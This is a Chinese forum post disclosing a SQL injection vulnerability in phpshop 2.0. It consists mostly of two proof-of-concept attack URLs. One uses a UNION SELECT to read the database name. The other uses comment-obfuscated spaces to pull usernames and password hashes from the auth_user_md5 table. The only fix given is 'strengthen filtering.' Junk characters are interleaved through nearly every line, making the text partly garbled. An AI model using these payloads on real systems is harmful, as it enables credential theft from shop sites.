标题 : phpshop 2.0 SQL Injection Vulnerability) l& L, m# f, r: T
# U% `( }5 _6 P+ G+ V/ u2 q
作者 : By onestree H# f" ]3 x, L) n) [* w
下载地址 : http://code.google.com/p/phpshop/downloads/list
# q2 @" p0 ?* |* i" k2 h9 M- Y测试地址: windows 7 / ubuntu
/ N9 `3 V: i) O7 v! \ % z! L& q0 }. H- p) [% E. D
; o: ^" m' Y2 b) m
SQLi p0c:
5 a7 l7 Q2 U$ k# t0 G$ E; C" Z
3 e2 L( L9 @9 H+ i==================4 `. f# [* A \2 n7 ]
- K5 A1 `9 E, n2 V" O8 m, M ohttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
( O: o! m" g% P- e7 H; g( Iunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
! B7 H7 b* ^ v4 F$ F
0 z! r5 \8 o g- ]# \# C! O7 hhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
4 Y* ]" }4 d5 V/ e
6 X: O+ ?9 J# `# I修复:* {0 {* y0 \* \* Z
加强过滤( I' V5 W! |) h. q5 E6 O6 d
" d9 }9 v* S0 A! `6 S1 @' ^, E! M9 N
|
发表于 2013-1-18 18:24:10
收藏
支持
反对